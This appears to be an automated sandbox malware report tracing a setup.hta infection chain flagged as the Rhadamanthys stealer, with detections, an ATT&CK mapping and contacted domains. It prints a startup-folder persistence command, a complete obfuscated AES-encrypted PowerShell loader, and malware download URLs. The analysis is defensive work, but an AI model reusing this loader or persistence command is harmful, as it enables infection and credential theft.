Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & echo url="c:\users\user\appdata\local\neuraconnect technologies\neuralink.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & exit
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $giwxcqo = 'aaaaaaaaaaaaaaaaaaaaah+ni+e0b2ks3mmnd0sjpk+fk7mupfilz9vvektme+yyv7vbgriarnlhwocdd3xnpyazs1tppp56hnlmknzg3rqllzowww3pr9gtvi4pqrfz4ymgg1kimek8k6tsh0fmp/6pzslccm7m343xsrtqho71kivioxddv9rxueizsvv/r8wv5pa7k2heaf/g1dnaet06jn6lwy+3xxybiz8z2sgfrwiakmlk9dab/leruy0oedx+hdr0opeuvodl8s3tyxpu555rlx05ctd0togq2y+lnpx6fd4bm0mfpap0pqtz0trl0pba/499qw6oyztygixjq47fiytqqcaizp9wkwplfvpxmsua7noylmdcjhqwuyn6keasq952ex0uepaiptsxaqoa6loyomefpb1evpj3uzmpl9bhjdqjhn1/olox0/aplc7vbmqv7fidtyco5ezzrtdcgspb4g8s6vz9sjg0qng+jhmufydvdumhxrj23a1qyqubslmhjdw4snduud7htfvqeags/sl3nlutqkpifmztty2alus2sdq4ofb+z/wvupl80+6+lh5xqnj8m1zd2oz2juag9qcds6ed1lwbdfwkgk1cexwfukroqw+5t52gj98o+jln7pagkzcbb87qc9dofnvz0xr6nvkj3ydwbpve9gy2ursq2smekc28xeg/ogbv4h/40vymmq48szmio+dl98hetduyjda10+uktzg0zrz9tre7n2dualc7akhfke8xxtlsjebjab+74tbyhg6tbn3q8jestwfhavcg/74qyryhv51rgapus4yimlfgdci+kn5tho8qhfy2apvsjgwwvc4nanwywkeodgvs3cud2h7z0etr930+qcff';$pavnvyn = 'ew1fbe1lt2rgdgv3txdrulpywffrbnzgefdtd1r3z2w=';$hgjhdnd = new-object 'system.security.cryptography.aesmanaged';$hgjhdnd.mode = [system.security.cryptography.ciphermode]::ecb;$hgjhdnd.padding = [system.security.cryptography.paddingmode]::zeros;$hgjhdnd.blocksize = 128;$hgjhdnd.keysize = 256;$hgjhdnd.key = [system.convert]::frombase64string($pavnvyn);$fmshi = [system.convert]::frombase64string($giwxcqo);$hwklsipl = $fmshi[0..15];$hgjhdnd.iv = $hwklsipl;$bkvkozaiu = $hgjhdnd.createdecryptor();$wonqxsfki = $bkvkozaiu.transformfinalblock($fmshi, 16, $fmshi.length - 16);$hgjhdnd.dispose();$lmmkhz = new-object system.io.memorystream( , $wonqxsfki );$dylrlk = new-object system.io.memorystream;$cyowfotfz = new-object system.io.compression.gzipstream $lmmkhz, ([io.compression.compressionmode]::decompress);$cyowfotfz.copyto( $dylrlk );$cyowfotfz.close();$lmmkhz.close();[byte[]] $ohxploz = $dylrlk.toarray();$mkeeaj = [system.text.encoding]::utf8.getstring($ohxploz);$mkeeaj \| powershell -	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & echo url="c:\users\user\appdata\local\neuraconnect technologies\neuralink.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & exit

Source: Identification.pif, 00000013.00000003.2424381489.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A86210 cpuid

8_2_00A86210

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

8_2_00A75E70

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A74C30 lstrlenW,_DebugHeapAllocator,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,

8_2_00A74C30

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match

File source: 00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match

File source: 00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	21 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	1 Obfuscated Files or Information	121 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Software Packing	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	12 Process Injection	1 DLL Side-Loading	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	121 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	21 PowerShell	Login Hook	1 Registry Run Keys / Startup Folder	121 Masquerading	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	41 Virtualization/Sandbox Evasion	LSA Secrets	3 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Process Injection	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
setup.hta	0%	ReversingLabs
setup.hta	2%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif	4%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	4%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing	1%	Virustotal		Browse
C:\Users\user\AppData\Roaming\ClassroomEc.exe	29%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\AppData\Roaming\ClassroomEc.exe	49%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
about:blank	0%	Avira URL Cloud	safe
http://whitemansearch.shop/ClassroomEc.exe	0%	Avira URL Cloud	safe
https://2no.co/2ZrVm4hn	100%	Avira URL Cloud	malware
https://2no.co/2ZrVm4;Set-ItemProperty	100%	Avira URL Cloud	malware
https://2no.co/2ZrVm4	100%	Avira URL Cloud	malware
http://whitemansearch.shop	0%	Avira URL Cloud	safe
http://whitemansearch.shop/ClassroomEc.exe	5%	Virustotal		Browse
http://whitemansearch.shop	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
2no.co	104.21.79.229	true	false	unknown
accounts.google.com	142.251.163.84	true	false	high
whitemansearch.shop	5.101.153.86	true	false	unknown
www.google.com	142.250.65.228	true	false	high
clients.l.google.com	142.251.40.174	true	false	high
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu	false		high
http://whitemansearch.shop/ClassroomEc.exe	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
about:blank	false	Avira URL Cloud: safe	low
https://www.google.com/recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b	false		high
https://www.google.com/favicon.ico	false		high
https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000002512400CC	false		high
https://www.google.com/recaptcha/api.js	false		high
https://2no.co/2ZrVm4	false	Avira URL Cloud: malware	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1	false		high
https://www.google.com/	false		high
https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2189639078.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware URL Reputation: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	false		high
